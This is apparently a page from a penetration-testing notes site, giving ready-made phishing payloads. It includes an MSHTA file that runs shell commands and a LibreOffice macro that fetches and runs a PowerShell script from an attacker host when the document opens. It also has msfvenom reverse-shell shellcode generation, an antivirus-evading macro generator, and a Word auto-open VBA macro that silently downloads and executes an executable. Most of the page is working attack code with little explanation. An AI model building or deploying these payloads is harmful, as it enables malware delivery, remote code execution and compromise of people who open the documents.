🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  • MSHTA
  • LibreOffice (Linux)
  • Microsoft Word
  • Macro
  • BadAssMacro
  • Standard Format
  1. Payload

Phishing Payload

Prepare for phishing payload

MSHTA

# simple ping


<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 3 10.10.x.y");
</script>
</head>

<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

LibreOffice (Linux)

If your target have script to open the document, use LibreOffice is a simple way.

  1. Write Documents

  2. Create Macros

Tools > Macros > Organize Macro > Basic

[Basic Macros]

Untitled 1 > New > (give a name)

Macro payload:

Sub Main
    Shell("cmd /c powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1")
    Shell("cmd /c powershell C:/Windows/Tasks/shell.ps1")
End Sub

  1. Tools > Customize > Events [Open Document]

> Macro... > (choose last macro)

  1. Save Document.

Microsoft Word

make sure you save the document as doc or docm. just try that both for your payload.

  1. Write Documents

  2. Create Macros

make sure specify the Macros in to the current document.
View > Macros

[Basic Macros]

"MyMacro" > Create

Macro payload

check the encoded payload below:

  1. Save Document.

Macro

BadAssMacro

Bypass antivirus with this auto genreated macro:

Generate shellcode with format raw

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw > shellcode.raw

Generate VBA

.\BadAssMacrosx64.exe -i shellcode.raw -s indirect -p no -w doc -o out.txt

Copy paste the out.txt to VBA Script.

Standard Format

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<ATTACKER IP>/testing.exe', 'C:\Windows\Tasks\testing.exe')"
    Dim exePath As String
    exePath = "C:\Windows\Tasks\" + "testing.exe"
    Shell str, vbHide
    Wait (3)
    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
PreviousSendemailNextBypass All The Things

Last updated 6 months ago

Bypass All The Things
https://github.com/Inf0secRabbit/BadAssMacros